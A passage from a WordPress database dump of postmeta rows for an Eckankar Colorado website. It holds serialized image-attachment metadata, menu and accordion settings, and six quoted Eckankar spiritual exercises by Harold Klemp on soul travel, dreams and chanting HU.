:5:\"width\";i:348;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_013-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_013-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_013-lg-250x333.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_013-lg-135x180.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_013-lg-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_013-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_013-lg-348x285.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"iPhone 6 Plus\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1444235235\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"32\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10838,125661,'_wp_attached_file','2019/08/ECK_Temple_CO_012-lg.jpg'),(10839,125661,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_012-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_012-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_012-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_012-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_012-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_012-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_012-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_012-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_012-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_012-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_012-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_012-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1443634384\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.28\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(63165,248434,'_wp_attached_file','2020/01/wslope-splashpix-FULL-SIZE.jpg'),(63166,248434,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1805;s:6:\"height\";i:1202;s:4:\"file\";s:38:\"2020/01/wslope-splashpix-FULL-SIZE.jpg\";s:5:\"sizes\";a:17:{s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"wslope-splashpix-FULL-SIZE-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:40:\"wslope-splashpix-FULL-SIZE-1536x1023.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:36:\"wslope-splashpix-FULL-SIZE-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-550x366.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-800x533.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-270x180.jpg\";s:5:\"width\";i:270;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-751x500.jpg\";s:5:\"width\";i:751;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:38:\"wslope-splashpix-FULL-SIZE-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:39:\"wslope-splashpix-FULL-SIZE-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(63365,248630,'_wp_attachment_image_alt','Old mine by a stream'),(63364,248630,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:381;s:6:\"height\";i:238;s:4:\"file\";s:34:\"2020/01/wslope-oldmine-sized-3.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"wslope-oldmine-sized-3-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"wslope-oldmine-sized-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:32:\"wslope-oldmine-sized-3-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:34:\"wslope-oldmine-sized-3-300x238.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:238;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:34:\"wslope-oldmine-sized-3-250x156.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:34:\"wslope-oldmine-sized-3-288x180.jpg\";s:5:\"width\";i:288;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:34:\"wslope-oldmine-sized-3-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1934,38781,'_wp_attached_file','2019/07/spex-intropix-1.jpg'),(1935,38781,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1545;s:6:\"height\";i:869;s:4:\"file\";s:27:\"2019/07/spex-intropix-1.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"spex-intropix-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"spex-intropix-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"spex-intropix-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"spex-intropix-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:25:\"spex-intropix-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:27:\"spex-intropix-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:27:\"spex-intropix-1-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:27:\"spex-intropix-1-550x309.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:27:\"spex-intropix-1-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:27:\"spex-intropix-1-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:27:\"spex-intropix-1-533x300.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:27:\"spex-intropix-1-889x500.jpg\";s:5:\"width\";i:889;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:27:\"spex-intropix-1-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:27:\"spex-intropix-1-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:28:\"spex-intropix-1-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1936,39045,'_edit_lock','1563815353:1'),(1937,39045,'_edit_last','2'),(6068,65663,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:415;s:6:\"height\";i:67;s:4:\"file\";s:31:\"2019/07/newsletter-gpx-sm-1.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"newsletter-gpx-sm-1-150x67.png\";s:5:\"width\";i:150;s:6:\"height\";i:67;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"newsletter-gpx-sm-1-300x48.png\";s:5:\"width\";i:300;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:29:\"newsletter-gpx-sm-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:30:\"newsletter-gpx-sm-1-300x67.png\";s:5:\"width\";i:300;s:6:\"height\";i:67;s:9:\"mime-type\";s:9:\"image/png\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:30:\"newsletter-gpx-sm-1-250x40.png\";s:5:\"width\";i:250;s:6:\"height\";i:40;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"newsletter-gpx-sm-1-210x67.png\";s:5:\"width\";i:210;s:6:\"height\";i:67;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:30:\"newsletter-gpx-sm-1-400x67.png\";s:5:\"width\";i:400;s:6:\"height\";i:67;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6067,65663,'_wp_attached_file','2019/07/newsletter-gpx-sm-1.png'),(1947,42010,'_edit_lock','1563725044:2'),(1948,42010,'_edit_last','2'),(1949,42010,'custom_accordion_columns_post_themes','theme1'),(1950,42010,'custom_accordion_title_bg_color',''),(1951,42010,'custom_accordion_title_font_color','#23507d'),(1952,42010,'custom_accordion_title_font_size','15'),(1953,42010,'custom_accordion_content_bg_color','#f9f9f9'),(1954,42010,'custom_accordion_content_font_color','#3d3d3d'),(1955,42010,'custom_accordion_content_font_size','13'),(1956,42010,'custom_accordion_content_padding','12'),(1957,42010,'_tpaccpro_wiki_acc_themes_title_position','left'),(1958,42010,'_tpaccpro_wiki_acc_themes_show_hide_icons','1'),(1959,42010,'_tpaccpro_wiki_acc_themes_icon_position','1'),(1960,42010,'_tpaccpro_wiki_acc_theme_content_margin','5'),(1961,42010,'boldgrid_hide_page_title','1'),(1962,42448,'_edit_lock','1563725876:2'),(1963,42448,'_edit_last','2'),(1964,7172,'_bgppb_default_editor','bgppb'),(2058,43187,'_edit_lock','1565893373:2'),(2059,43187,'_edit_last','2'),(2060,43187,'wpsm_accordion_data','s:8910:\"a:6:{i:0;a:4:{s:15:\"accordion_title\";s:24:\"Soul Travel The Easy Way\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1483:\"<p><img class=\"alignleft wp-image-123035 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/spex-accord-1.jpg\" alt=\"\" width=\"175\" height=\"238\" /></p>\r\n<p><strong><span style=\"color: #23507d;\">Soul Travel The Easy Way - A Spiritual Exercise</span></strong></p>\r\n<p>Just before going to bed at night concentrate your attention on the Spiritual Eye, that place between the eyebrows. Chant HU or God inwardly and silently.</p>\r\n<p>Hold your attention on a blank screen in the inner vision, and keep it free of any pictures if at all possible. If you need a substitute for mental pictures flashing up unwantedly, put the image of the Living ECK Master in place of them.</p>\r\n<p>After a few minutes of this , you may hear a faint clicking sound in one ear or the sound of a cork popping. You will suddenly find yourself outside the physical body, looking back at it in the room. Now you are ready for a short journey in the other worlds.</p>\r\n<p>There is nothing to fear, for no harm can come to you while outside the body. Although you may not know it, the Mahanta will be standing by to keep watch over your progress. After a while the Soul body will return and slide gently into the physical self with hardly more than a very light jolt.</p>\r\n<p>If this is not successful the first time, try it again, for the technique works. It has worked for others.</p>\r\n<p><span style=\"color: #23507d;\">Harold Klemp - <em>The Spiritual Exercises of ECK, p. 235</em></span></p>\";}i:1;a:4:{s:15:\"accordion_title\";s:25:\"Getting Answers in Dreams\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1277:\"<p><img class=\"alignleft size-full wp-image-123036\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/spex-accord-2.jpg\" alt=\"\" width=\"178\" height=\"241\" /></p>\r\n<p><strong><span style=\"color: #23507d;\">Getting Answers in Dreams – A Spiritual Exercise</span></strong></p>\r\n<p>At some level Soul knows everything. If there is something that you would like to bring into consciousness, here is a way to get help.</p>\r\n<p>Before you go to sleep, relax and decide that upon wakening you will have an answer to whatever it is that you desire.</p>\r\n<p>When you awaken it will be in the forefront of your thoughts. At the moment of slipping from or into sleep, you are opened to truth and in direct contact with it. It is at this point that you will perceive your answer.</p>\r\n<p>Immediately make note of it in your dream journal.</p>\r\n<p>We know that there is an answer for every situation that comes up in our life. There is always a way, somehow. What holds us back is our attitudes.</p>\r\n<p>Learn the value of doing a spiritual exercise just before retiring or upon awakening. It works to your advantage during these times of change in conscious awareness.</p>\r\n<p><span style=\"color: #23507d;\">Harold Klemp - <em>The Spiritual Exercises of ECK, p. 35</em></span></p>\";}i:2;a:4:{s:15:\"accordion_title\";s:25:\"Contact The Light & Sound\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1409:\"<p><img class=\"alignleft size-full wp-image-123037\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/spex-accord-3.jpg\" alt=\"\" width=\"179\" height=\"242\" /></p>\r\n<p><strong><span style=\"color: #23507d;\">The Temple Door - A Spiritual Exercise</span></strong></p>\r\n<p>This is a very simple exercise to make contact with the Voice of God.</p>\r\n<p>Close your eyes and relax. You are preparing to enter the inner temple, that sacred place where Soul has communication with God. You may see the Light of God first in your Spiritual Eye. You may see it as a Blue Light or a Blue Star. You may see It as a globe or blob of light.</p>\r\n<p>This means you have contact with the highest state of consciousness that is available. It can uplift you to the very same state, too, but not overnight – the shock would be too great.</p>\r\n<p>After you see the light in your Spiritual Eye or feel It in your heart center, then comes the Sound. The Sound may come first at times.</p>\r\n<p>The Sound may be that of the flute of God which comes from the Soul Plane. Or you may hear the buzzing of bees or any number of different sounds. Later, as you move higher, it may become a very high peeping sound, a single peep so high that it feels as if you can barely reach it. It is the Voice of God uplifting you.</p>\r\n<p><span style=\"color: #23507d;\">Harold Klemp - <em>The Spiritual Exercises of ECK,</em></span> p. 137</p>\";}i:3;a:4:{s:15:\"accordion_title\";s:23:\"Create a Brighter World\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1172:\"<p><img class=\"alignleft size-full wp-image-123038\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/spex-accord-4.jpg\" alt=\"\" width=\"186\" height=\"248\" /></p>\r\n<p><span style=\"color: #23507d;\"><strong>Create a Brighter World - A Spiritual Exercise</strong></span></p>\r\n<p>If you have an uncomfortable experience or dream - or one you don\'t understand - take it into contemplation. Begin by singing HU for a few minutes. Then rewind the dream or experience, and run it through your mind. Next, visualize a door that opens into golden sunlight. This is the Light of God.</p>\r\n<p>Now take the uncomfortable experience from the darkness; take it from the silence and solitude through the open doorway where it is dissolved by the Light and Sound of God.</p>\r\n<p>This exercise can get you in the habit of looking for a brighter, more creative world, where you can find more inner satisfaction. With the help of the Inner Master, the Mahanta, you are learning to take charge of your life. You are becoming the aware Soul, the creator of your own worlds.</p>\r\n<p><span style=\"color: #23507d;\">Harold Klemp - <em>The Spiritual Exercises of ECK,</em></span> p. 231</p>\";}i:4;a:4:{s:15:\"accordion_title\";s:20:\"Watching Your Dreams\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1287:\"<p><img class=\"alignleft size-full wp-image-123039\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/spex-accord-5.jpg\" alt=\"\" width=\"183\" height=\"246\" /></p>\r\n<p><strong><span style=\"color: #23507d;\">Watching Your Dreams - A Spiritual Exercise</span></strong></p>\r\n<p>The dream world and its people are real. It is only our recall and understanding of it that are incomplete. Our link with the inner worlds is usually through dreams, but illusion can make our memory of inner events faulty.</p>\r\n<p>What about the dream people who appear to be just symbolic parts of ourselves? Lets start with the waking dream. The Mahanta uses it to give someone a spiritual insight from an experience in his daily life. The Master draws on the individual\'s experience with real people and real events to point out some personal truth.</p>\r\n<p>Apply the principle of the waking dream to your dream world. The people you meet there are Souls, just like you. However, the Mahanta can turn your experience with them into an open window of understanding, to unlock your desires, needs, and goals.</p>\r\n<p>Keep a journal of your dreams and begin to note any parallels between them.</p>\r\n<p><span style=\"color: #23507d;\">Harold Klemp - <em>The Spiritual Exercises of ECK,</em></span> p. 211</p>\";}i:5;a:4:{s:15:\"accordion_title\";s:15:\"Stepping Stones\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1238:\"<p><img class=\"alignleft size-full wp-image-123040\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/spex-accord-6.jpg\" alt=\"\" width=\"182\" height=\"248\" /></p>\r\n<p><strong><span style=\"color: #23507d;\">Stepping-Stones - A Spiritual Exercise</span></strong></p>\r\n<p>Some people never recognize the blessings they receive. Others may look back and realize they\'ve had a gift of healing of some sort. Maybe something has changed at work to make their life better. But it depends upon the individual – how conscious you are.</p>\r\n<p>A spiritual exercise to begin recognizing your gifts is this: Sing HU quietly to yourself or out loud.</p>\r\n<p>Look at the obstacles in your life that you think are stumbling blocks. Imagine them becoming stepping-stones. How are they teaching you about yourself? Open yourself and gain greater awareness of this as you sing HU.</p>\r\n<p>The teaching\'s of ECK are all about God\'s love for you. HU is an ancient name for God that is the key to your secret worlds. Once you learn this key, you will find a blending of your inner and outer worlds. You\'ll find yourself filling with love.</p>\r\n<p><span style=\"color: #23507d;\">Harold Klemp - <em>The Spiritual Exercises of ECK,</em></span> p. 171</p>\";}}\";'),(2061,43187,'wpsm_accordion_count','6'),(2062,43187,'Accordion_Settings','s:570:\"a:18:{s:13:\"acc_sec_title\";s:2:\"no\";s:10:\"op_cl_icon\";s:3:\"yes\";s:14:\"acc_title_icon\";s:3:\"yes\";s:10:\"acc_radius\";s:3:\"yes\";s:10:\"acc_margin\";s:3:\"yes\";s:15:\"acc_op_cl_align\";s:5:\"right\";s:13:\"enable_toggle\";s:2:\"no\";s:16:\"enable_ac_border\";s:3:\"yes\";s:13:\"expand_option\";s:1:\"3\";s:9:\"ac_styles\";s:1:\"1\";s:16:\"acc_title_bg_clr\";s:7:\"#e8e8e8\";s:18:\"acc_title_icon_clr\";s:7:\"#23507d\";s:15:\"acc_desc_bg_clr\";s:7:\"#ffffff\";s:17:\"acc_desc_font_clr\";s:7:\"#000000\";s:10:\"title_size\";s:2:\"16\";s:8:\"des_size\";s:2:\"14\";s:11:\"font_family\";s:9:\"Open Sans\";s:10:\"custom_css\";s:0:\"\";}\";'),(2063,43187,'boldgrid_hide_page_title','1'),(2151,45158,'_menu_item_type','post_type'),(2124,45155,'_menu_item_type','post_type'),(2125,45155,'_menu_item_menu_item_parent','45183'),(2126,45155,'_menu_item_object_id','32170'),(2127,45155,'_menu_item_object','page'),(2128,45155,'_menu_item_target',''),(2129,45155,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2130,45155,'_menu_item_xfn',''),(2131,45155,'_menu_item_url',''),(2169,45183,'_menu_item_type','custom'),(2133,45156,'_menu_item_type','post_type'),(2134,45156,'_menu_item_menu_item_parent','45183'),(2135,45156,'_menu_item_object_id','32074'),(2136,45156,'_menu_item_object','page'),(2137,45156,'_menu_item_target',''),(2138,45156,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2139,45156,'_menu_item_xfn',''),(2140,45156,'_menu_item_url',''),(2170,45183,'_menu_item_menu_item_parent','0'),(2172,45183,'_menu_item_object','custom'),(2152,45158,'_menu_item_menu_item_parent','45183'),(2153,45158,'_menu_item_object_id','31882'),(2154,45158,'_menu_item_object','page'),(2155,45158,'_menu_item_target',''),(2156,45158,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2157,45158,'_menu_item_xfn',''),(2158,45158,'_menu_item_url',''),(2171,45183,'_menu_item_object_id','45183'),(2173,45183,'_menu_item_target',''),(2174,45183,'_menu_item_classes','a:1:{i:0